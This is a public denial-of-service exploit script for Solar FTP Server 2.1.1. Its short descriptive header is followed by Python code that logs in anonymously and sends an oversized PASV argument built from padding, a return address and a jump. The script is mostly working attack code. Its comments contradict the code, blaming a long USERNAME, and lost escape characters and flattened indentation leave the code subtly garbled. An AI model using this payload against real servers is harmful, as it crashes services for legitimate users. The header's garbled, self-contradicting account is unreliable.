Solar FTP Server version 2.1.1 remote denial of service exploit.
#!/usr/bin/python
# Exploit Title: Solar FTP Server 2.1.1 PASV Command - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 31 january 2024
# Vendor Homepage: N/A
# Download to demo:
# Notification vendor: No reported
# Tested Version: Solar FTP Server 2.1.1
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# VĂdeo:
#1. Description
#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.
#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.
import socket,sys,time,struct
if len(sys.argv) < 2:
print("[-]Usage: %s <ip addr> " % sys.argv[0])
sys.exit(0)
ip = sys.argv[1]
if len(sys.argv) > 2:
platform = sys.argv[2]
ret = struct.pack('<L', 0x7C9572D8)
#works when the server is on 192.168.133.128
padding = b"x43" * 468
junk = b"x43" * 1532
frontpad = b"x41" * 100 + b"xebx30" + b"x41" * 21
payload = frontpad + ret + padding + junk
print ("[+] Solar FTP 2.1.1 PASV - Denied of Service - DoS n[+] Author: Fernando Mengalin")
print ("[+] Connecting to "+ip)
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((ip,21))
except:
print("[-] Connection to "+ip+" failed!")
sys.exit(0)
print ("[+] Exploiting")
print("[*] Sending payload to command PASV...")
s.send(b"USER anonrn")
s.recv(1024)
s.send(b"PASS anonrn")
s.recv(1024)
s.send(b"PASV " + payload + b"rn")
print("[+] Done - Exploited")
